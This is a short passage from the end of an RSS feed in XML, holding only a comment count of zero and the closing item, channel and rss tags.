		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
